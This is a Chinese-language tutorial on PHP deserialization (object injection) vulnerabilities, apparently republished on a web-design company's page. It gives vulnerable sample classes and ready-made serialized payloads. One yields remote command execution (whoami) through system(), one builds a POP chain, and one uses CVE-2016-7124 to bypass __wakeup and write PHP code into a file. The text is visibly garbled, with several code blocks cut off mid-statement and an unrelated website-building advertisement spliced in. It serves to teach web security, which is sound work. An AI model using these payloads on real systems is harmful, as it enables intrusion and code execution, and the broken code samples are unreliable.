0x00 序列化
所有php里面的值都可以使用函數(shù)serialize()來返回一個包含字節(jié)流的字符串來表示����。unserialize()函數(shù)能夠重新把字符串變回php原來的值�。 序列化一個對象將會保存對象的所有變量��,但是不會保存對象的方法�����,只會保存類的名字���。 所有php里面的值都可以使用函數(shù)
serialize()
來返回一個包含字節(jié)流的字符串來表示���。
unserialize()
函數(shù)能夠重新把字符串變回php原來的值��。 序列化一個對象將會保存對象的所有變量�,但是不會保存對象的方法���,只會保存類的名字�����。
序列化的例子
創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供徐匯網(wǎng)站建設(shè)�、徐匯做網(wǎng)站�、徐匯網(wǎng)站設(shè)計、徐匯網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)��、網(wǎng)頁設(shè)計與制作��、徐匯企業(yè)網(wǎng)站模板建站服務��,十余年徐匯做網(wǎng)站經(jīng)驗���,不只是建網(wǎng)站���,更提供有價值的思路和整體網(wǎng)絡(luò)服務��。
1,1.2,false );
class ClassName {
var $var_name = 1;
function myfunction(){
return "1";
}
}
$arrayName = array($var_int,$var_str,$var_float,$var_bool,$var_arr,new ClassName ());
foreach ($arrayName as $key => $value) {
echo serialize($value)."
";
}
結(jié)果是
i:1;
s:3:"123";
d:1.2;
b:1;
a:3:{i:1;i:1;i:2;d:1.2;i:3;b:0;}
O:9:"ClassName":1:{s:8:"var_name";i:1;}
從例子中我們可以看到����,變量�����,數(shù)組��,對象可以被序列化�。變量的值會被保存下來�。以:隔開,類名會被保存下來�,類變量,類變量名和類變量值會被保存下來����,類方法不會被保存起來。
0x01 反序列化
反序列化就是將序列化后的字符串轉(zhuǎn)化回數(shù)組和對象
看例子
1,1.2,false );
$un_class_str = 'O:9:"ClassName":1:{s:8:"var_name";i:1;}';
var_dump(unserialize($un_arr_str));
$O = unserialize($un_class_str);
// var_dump($O);
var_dump($O->var_name);
這里的結(jié)果是
array(3) { [1]=> int(1) [2]=> float(1.2) [3]=> bool(false) }
NULL
比較奇怪的是為什么第二個會是NULL���。因為將對象序列化之后�����,只是保存它的關(guān)鍵數(shù)據(jù)���,對于這個類的具體內(nèi)容一無所知��。所以反序列回一個對象的時候��,需要反序列的上下文中存在模板(這里就是類的定義)����。
0x02 魔術(shù)函數(shù)
PHP 將所有以 __(兩個下劃線)開頭的類方法保留為魔術(shù)方法���。
下面舉一個例子����。
class ClassName {
function __construct(){
echo "Hello,I am __construct";
}
}
new ClassName();
這里的輸出結(jié)果是
Hello,I am __construct
其實這里的一個對象實例化的過程中默認會調(diào)用的__construct()��。
php常用的魔術(shù)函數(shù)有
__construct()�����, __destruct()���, __call()�, __callStatic(), __get()�����, __set()���, __isset()�����, __unset()�, __sleep()����, __wakeup()����, __toString(), __invoke()��, __set_state()���, __clone() 和 __debugInfo()
這里們并非每個都會在這里面用到�,下面用一個例子來說下看幾個常用到的魔術(shù)函數(shù)。
";
}
function __destruct(){
echo "Hello,I am __destruct"."
";
}
function __wakeup(){
echo "Hello,I am __wakeup"."
";
}
function __sleep(){
echo "Hello,I am __sleep"."
";
return array($this->name);
}
function __get($name){
echo "Hello,I am __get"."
";
return $this->name;
}
function __toString(){
echo "Hello,I am __toString"."
";
return "Hello";
}
}
$O = new ClassName();
$s= serialize($O);
echo $s."
";
$O = unserialize($s);
$O."
";
$O->nothing;
從例子我們可以看出�����,當初序列化一個對象是默認會調(diào)用__sleep���,反序列化是會調(diào)用__wakeup���,而__construct會在實例化一個對象是被調(diào)用,__desturct會在對象不再使用或者程序退出時自動調(diào)用, __toString會在對象被當做字符串時使用(特別注意字符串連接符.)���。__get會在讀取不可訪問的屬性的值的時候調(diào)用
0x03 反序列化漏洞
先舉一個反序列化漏洞例子
ip);
}
}
$O = unserialize($_GET['daiker']);
我們分析這串代碼�,可以得出一下結(jié)論
- 反序列化的的字符串我們可控
- 反序列化默認會調(diào)用
__wakeup() - 變量ip是會保存在反序列化的字符串里面的�����,我們可控
所以我們下面構(gòu)造payload���。
然后
http://127.0.0.1/php-obj/example4.php?daiker=O%3A9%3A%22ClassName%22%3A1%3A%7Bs%3A2%3A%22ip%22%3Bs%3A7%3A%22%7Cwhoami%22%3B%7D
就可以執(zhí)行whoami,所以這里就導致RCE
所以總結(jié)來講��,PHP對象注入(又叫反序列化漏洞)�,需要幾點條件。
- 反序列化字符串可控
- 有魔術(shù)方法會調(diào)用對象屬性
對于反序列化的漏洞利用的效果取決于魔術(shù)方法里面對成員屬性的調(diào)用方式��,如上面的system()就會導致RCE��,也可能是注入���,任意文件上傳等問題����。
0x04 類變量的注意點
看下面一個例子
";
echo urlencode(serialize(new ClassName()));
看輸出結(jié)果
O:9:"ClassName":3:{s:12:"ClassNamea";i:1;s:4:"*b";i:2;s:1:"c";i:3;}
O%3A9%3A%22ClassName%22%3A3%3A%7Bs%3A12%3A%22%00ClassName%00a%22%3Bi%3A1%3Bs%3A4%3A%22%00%2A%00b%22%3Bi%3A2%3Bs%3A1%3A%22c%22%3Bi%3A3%3B%7D%
一個個比較�,我們會發(fā)現(xiàn)不可打印字符打印不出來。如果我們把可打印字符用作payload����,會利用失敗.
如果是private 的變量,序列化的時候就會變成\x00類名\x變量名�����,這里就是\xClassName\x00a���,urlencode之后變成%00ClassName%00a。
如果是protected的變量���,序列化之后就會變成\x00\x2A\x00變量名��。
0x05 POP Chain
前面說到����,要找反序列化漏洞,要有兩個點�。第一個是反序列化的參數(shù)可控,第二個是有魔術(shù)方法調(diào)用對象屬性����。但是我們往往會遇到一個問題,就是我們反序列化的參數(shù)可控�,但是,沒有合適的魔術(shù)方法��,或者是魔術(shù)方法對對象屬性的調(diào)用方法無法利用��。這時候就有人提出了一個新的思路叫做POP Chain(跟二進制里面的ROP Chain 思路很像)����。POP chain利用的條件是找到的魔術(shù)方法不可以直接利用,但它有調(diào)用其它方法或者使用其它的變量時�,可以在其它的類中尋找同名的方法或是變量,直到可以利用的點��。
下面看一個簡單的例子。
attack();
}
function attack(){
system($this->cmd);
}
}
class ClassName {
var $class ;
function __construct(){
$this->class=new One();
}
function __wakeup(){
$this->class->myfunction();
}
}
$O = unserialize($_GET['daiker']);
我們分析下代碼���,可以發(fā)現(xiàn)一下幾點
- 反序列化參數(shù)可控
- 存在魔術(shù)方法__construct()����,這里不可以直接利用
- __construct()調(diào)用了myfunction(),myfunction()不可以利用
- 其他類存在同名函數(shù)myfunction()�����,且另外一個類里面的Myfunction不可以單獨被利用���,但是存在可被利用的函數(shù)
system()
構(gòu)造payload
cmd = "whoami";
}//跟直接寫 var $cmd = "whoami'��,不寫__construct一樣��,這里演示還有這種寫法
}
class ClassName {
var $class ;
function __construct(){
$this->class=new Another();
}
}
echo serialize(new ClassName());
然后提交
http://127.0.0.1/php-obj/pop.php?daiker=O:9:%22ClassName%22:1:{s:5:%22class%22;O:7:%22Another%22:1:{s:3:%22cmd%22;s:6:%22whoami%22;}}
0x06 CVE-2016-7124
我們看一個代碼
var = "hello,wold";
}
function __destruct(){
$fp=fopen("F:\\phpStudy\\WWW\\unse\\hello.php","w");
fputs($fp,$this->var);
fclose($fp);
}
}
$content = $_POST['content'];
$object = unserialize($content);
?>
對比上面的代碼���,可以發(fā)現(xiàn)多了
function __wakeup(){
$this->var = "hello,wold";
}
這個魔術(shù)函數(shù)的作用就是在反序列化的時候會執(zhí)行函數(shù)里面的東西,在這題�����,��,我們就算更改了var這個變量的值���,wakeup還是會把他改回來�。這時候就要用到一個CVE���。
谷歌發(fā)現(xiàn)了CVE-2016-7124�����。簡單來說就是當序列化字符串中����,如果表示對象屬性個數(shù)的值大于真實的屬性個數(shù)時就會跳過wakeup的執(zhí)行�。參考https://bugs.php.net/bug.php?id=72663,某一種情況下��,出錯的對象不會被毀掉�����,會繞過wakeup函數(shù)�����、引用其他的魔術(shù)方法。
我們只要保證成員屬性數(shù)目大于實際數(shù)目時可繞過wakeup方法����,原來的序列化字符串是O:6:"object":1:{s:3:"var";s:18:"<?php phpinfo() ?>";}
把object后面的1更改為大于1的數(shù)字就可以了。��。
成功繞過
0x07 經(jīng)典案例
1.typecho 反序列化漏洞
2.SugarCRM v6.5.23反序列化漏洞
名稱欄目:php反序列化漏洞
瀏覽地址:
http://weahome.cn/article/gshcse.html
重慶分公司
重慶分公司
